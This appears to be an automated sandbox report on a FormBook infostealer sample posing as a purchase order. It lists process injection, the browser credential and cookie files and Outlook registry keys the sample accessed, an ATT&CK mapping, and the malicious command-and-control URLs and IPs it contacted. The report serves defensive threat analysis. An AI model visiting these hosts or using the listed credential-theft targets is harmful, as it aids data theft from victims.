              Source: C:\Windows\SysWOW64\fc.exeThread APC queued: target process: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeJump to behavior
              Source: C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: xVHAYGlJzfAqXG.exe, 00000005.00000000.2438225898.0000000001A80000.00000002.00000001.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000005.00000002.3982283115.0000000001A80000.00000002.00000001.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000000.2597335636.0000000000C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
              Source: xVHAYGlJzfAqXG.exe, 00000005.00000000.2438225898.0000000001A80000.00000002.00000001.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000005.00000002.3982283115.0000000001A80000.00000002.00000001.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000000.2597335636.0000000000C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: xVHAYGlJzfAqXG.exe, 00000005.00000000.2438225898.0000000001A80000.00000002.00000001.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000005.00000002.3982283115.0000000001A80000.00000002.00000001.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000000.2597335636.0000000000C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: xVHAYGlJzfAqXG.exe, 00000005.00000000.2438225898.0000000001A80000.00000002.00000001.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000005.00000002.3982283115.0000000001A80000.00000002.00000001.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000000.2597335636.0000000000C40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.PO No. 0146850827805 HSP0059842.exe.b80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2514153337.0000000001480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3982308756.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3981444613.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3985173271.0000000004A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3982249648.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2515425897.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3982653238.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.PO No. 0146850827805 HSP0059842.exe.b80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2514153337.0000000001480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3982308756.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3981444613.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3985173271.0000000004A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3982249648.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2515425897.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3982653238.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		312
              Process Injection              		2
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		312
              Process Injection              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Abuse Elevation Control Mechanism              		NTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information              		LSA Secrets12
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PO No. 0146850827805 HSP0059842.exe66%ReversingLabsWin32.Backdoor.FormBook
              PO No. 0146850827805 HSP0059842.exe100%AviraHEUR/AGEN.1318544
              PO No. 0146850827805 HSP0059842.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.44756.pizza/a59t/0%Avira URL Cloudsafe
              http://www.adadev.info/ctdy/100%Avira URL Cloudmalware
              http://www.investshares.net/cf9p/0%Avira URL Cloudsafe
              http://cifasnc.info/8rr3/?fVnx=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg0%Avira URL Cloudsafe
              http://www.cifasnc.info0%Avira URL Cloudsafe
              http://www.gayhxi.info/k2i2/?XLc=1bXtqxM&fVnx=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWgf0QosAiOAvVd+8Dka4oeApiw402Mgl8dYUz322qMWWIHFaw/E=100%Avira URL Cloudmalware
              http://www.lonfor.website/bowc/?fVnx=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwYRaJOa9Z44z2qtPWfGvKNoA9tlUfzwY1s4wtqx/AHoNma7bQRw=&XLc=1bXtqxM0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/?fVnx=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvWclXvo3kWkxBBtOzLzdzXSMQ2FkkrP/66suezda9Novq3ipBd8=&XLc=1bXtqxM0%Avira URL Cloudsafe
              http://www.adadev.info/ctdy/?fVnx=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZL0slqAhO+jziob4VAcWGL05V4I5mluLEA+jVEoKfPxy0XA8CH1k=&XLc=1bXtqxM100%Avira URL Cloudmalware
              http://www.grimbo.boats/kxtt/0%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/?fVnx=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH0APXdXeLgJf/YH3s7SsSxcTFbV5TCLi5mGdkJSFjaSfV97iwCLA=&XLc=1bXtqxM0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/100%Avira URL Cloudmalware
              http://www.lonfor.website/bowc/0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/?fVnx=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvEJa00pgxMS/8uYz9VBXNTWbWf/uKLTh5jUQ9SsZ4eSETpRQQJc=&XLc=1bXtqxM100%Avira URL Cloudmalware
              http://www.44756.pizza/a59t/?fVnx=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgIazDBG/TFF/REucHmN8GJFpkvs6MD1/91Qml7NfLeQ7pQK3fwg=&XLc=1bXtqxM0%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/0%Avira URL Cloudsafe
              http://cifasnc.info/xmlrpc.php0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.cifasnc.info
              		188.114.97.3
              		truefalse
                		high
                promocao.info
                		84.32.84.32
                		truetrue
                  		unknown
                  www.grimbo.boats
                  		104.21.18.171
                  		truefalse
                    		high
                    www.lonfor.website
                    		199.192.21.169
                    		truefalse
                      		high
                      www.gayhxi.info
                      		47.83.1.90
                      		truefalse
                        		high
                        www.investshares.net
                        		154.197.162.239
                        		truefalse
                          		high
                          zcdn.8383dns.com
                          		134.122.133.80
                          		truefalse
                            		high
                            www.adadev.info
                            		47.83.1.90
                            		truefalse
                              		high
                              www.jrcov55qgcxp5fwa.top
                              		unknown
                              		unknownfalse
                                		unknown
                                www.promocao.info
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.44756.pizza
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.nosolofichas.online
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.grimbo.boats/kxtt/?fVnx=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvWclXvo3kWkxBBtOzLzdzXSMQ2FkkrP/66suezda9Novq3ipBd8=&XLc=1bXtqxMtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.grimbo.boats/kxtt/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.44756.pizza/a59t/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.adadev.info/ctdy/?fVnx=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZL0slqAhO+jziob4VAcWGL05V4I5mluLEA+jVEoKfPxy0XA8CH1k=&XLc=1bXtqxMtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.gayhxi.info/k2i2/?XLc=1bXtqxM&fVnx=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWgf0QosAiOAvVd+8Dka4oeApiw402Mgl8dYUz322qMWWIHFaw/E=true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.adadev.info/ctdy/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.lonfor.website/bowc/?fVnx=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwYRaJOa9Z44z2qtPWfGvKNoA9tlUfzwY1s4wtqx/AHoNma7bQRw=&XLc=1bXtqxMtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.investshares.net/cf9p/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.promocao.info/zaz4/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.cifasnc.info/8rr3/?fVnx=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH0APXdXeLgJf/YH3s7SsSxcTFbV5TCLi5mGdkJSFjaSfV97iwCLA=&XLc=1bXtqxMtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lonfor.website/bowc/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.promocao.info/zaz4/?fVnx=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvEJa00pgxMS/8uYz9VBXNTWbWf/uKLTh5jUQ9SsZ4eSETpRQQJc=&XLc=1bXtqxMtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.cifasnc.info/8rr3/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.44756.pizza/a59t/?fVnx=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgIazDBG/TFF/REucHmN8GJFpkvs6MD1/91Qml7NfLeQ7pQK3fwg=&XLc=1bXtqxMtrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabfc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://cifasnc.info/8rr3/?fVnx=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWgfc.exe, 00000006.00000002.3983373594.00000000045A6000.00000004.10000000.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000002.3983097495.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.cifasnc.infoxVHAYGlJzfAqXG.exe, 00000008.00000002.3985173271.0000000004AF0000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.ecosia.org/newtab/fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ac.ecosia.org/autocomplete?q=fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://cifasnc.info/xmlrpc.phpfc.exe, 00000006.00000002.3983373594.00000000045A6000.00000004.10000000.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000002.3983097495.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        154.197.162.239
                                                        		www.investshares.netSeychelles
                                                        		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                        104.21.18.171
                                                        		www.grimbo.boatsUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        199.192.21.169
                                                        		www.lonfor.websiteUnited States
                                                        		22612NAMECHEAP-NETUSfalse
                                                        47.83.1.90
                                                        		www.gayhxi.infoUnited States
                                                        		3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                                        188.114.97.3
                                                        		www.cifasnc.infoEuropean Union
                                                        		13335CLOUDFLARENETUSfalse
                                                        84.32.84.32
                                                        		promocao.infoLithuania
                                                        		33922NTT-LT-ASLTtrue
                                                        134.122.133.80
                                                        		zcdn.8383dns.comUnited States
                                                        		64050BCPL-SGBGPNETGlobalASNSGfalse

                                                        General Information

                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1592269
                                                        Start date and time:2025-01-16 00:41:40 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 30s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Run name:Run with higher sleep bypass
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:PO No. 0146850827805 HSP0059842.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@5/1@10/7
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 87%
                                                        • Number of executed functions: 13
                                                        • Number of non-executed functions: 327
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        154.197.162.239New Order#12125.exeGet hashmaliciousFormBookBrowse
                                                        • www.investshares.net/cf9p/
                                                        CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                        • www.investshares.net/cf9p/
                                                        CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                        • www.investshares.net/cf9p/
                                                        PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                        • www.investshares.net/cf9p/
                                                        Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                        • www.investshares.net/cf9p/
                                                        Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                        • www.investshares.net/cf9p/
                                                        inv#12180.exeGet hashmaliciousFormBookBrowse
                                                        • www.investshares.net/cf9p/
                                                        104.21.18.171New Order#12125.exeGet hashmaliciousFormBookBrowse
                                                        • www.grimbo.boats/kxtt/
                                                        CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                        • www.grimbo.boats/kxtt/
                                                        Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                        • www.grimbo.boats/mjs1/
                                                        smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                        • www.grimbo.boats/ej4l/
                                                        PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                        • www.grimbo.boats/kxtt/
                                                        Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                        • www.grimbo.boats/kxtt/
                                                        Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                        • www.grimbo.boats/kxtt/
                                                        SecuriteInfo.com.Variant.Tedy.130342.18814.exeGet hashmaliciousFormBookBrowse
                                                        • www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx
                                                        199.192.21.169New Order#12125.exeGet hashmaliciousFormBookBrowse
                                                        • www.lonfor.website/bowc/
                                                        CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                        • www.lonfor.website/bowc/
                                                        MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                        • www.bokus.site/qps0/
                                                        Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                        • www.sesanu.xyz/rf25/
                                                        CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                        • www.lonfor.website/bowc/
                                                        plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                        • www.astrafusion.xyz/pcck/
                                                        QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                        • www.bokus.site/qps0/
                                                        QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                        • www.bokus.site/qps0/
                                                        QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                        • www.bokus.site/qps0/
                                                        ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.solidf.xyz/stho/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        www.grimbo.boatsNew Order#12125.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.18.171
                                                        CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.18.171
                                                        Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.18.171
                                                        CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.182.198
                                                        gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.182.198
                                                        FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.18.171
                                                        smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.18.171
                                                        PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.18.171
                                                        rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.182.198
                                                        Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.18.171
                                                        www.lonfor.websiteNew Order#12125.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        inv#12180.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.21.169
                                                        www.cifasnc.infoNew Order#12125.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.3
                                                        CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.3
                                                        KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.96.3
                                                        Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.97.3
                                                        Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.97.3
                                                        ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.128.109
                                                        bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                        • 172.67.128.109

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUShttps://vagdevi-42.github.io/Amazon/Get hashmaliciousUnknownBrowse
                                                        • 104.17.24.14
                                                        https://cdn.trytraffics.com/rdr/YWE9MzUyOTI1MTM3JnNlaT0xMDEzOTE1OSZ0az1WbjFnS2YzTGZPOGx6TWZZWVJtUiZ0PTUmYz05MGFzODc2ZmQ4OWFzNWZnOGEwOXM=Get hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        https://xraffay-dev.github.io/Amazon-Clone/Get hashmaliciousUnknownBrowse
                                                        • 104.17.25.14
                                                        https://contentenforcementtooladshifters-ten.vercel.app/help&zGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.26.4.15
                                                        https://usmanqayyum109.github.io/Amazon/Get hashmaliciousUnknownBrowse
                                                        • 104.17.24.14
                                                        https://cdn.trytraffics.com/rdr/YWE9MzUyODUzMjAxJnNlaT0xNDY1MjYzNiZ0az1kOFlPYVB5dlVvT01RaXpPdjlOWSZ0PTUmYz05MGFzODc2ZmQ4OWFzNWZnOGEwOXM=Get hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        https://livedashboardkit.info/track-67880f10.jsGet hashmaliciousUnknownBrowse
                                                        • 172.67.166.199
                                                        https://utkarsh31017.github.io/Amazon-Clone-/Get hashmaliciousUnknownBrowse
                                                        • 104.17.24.14
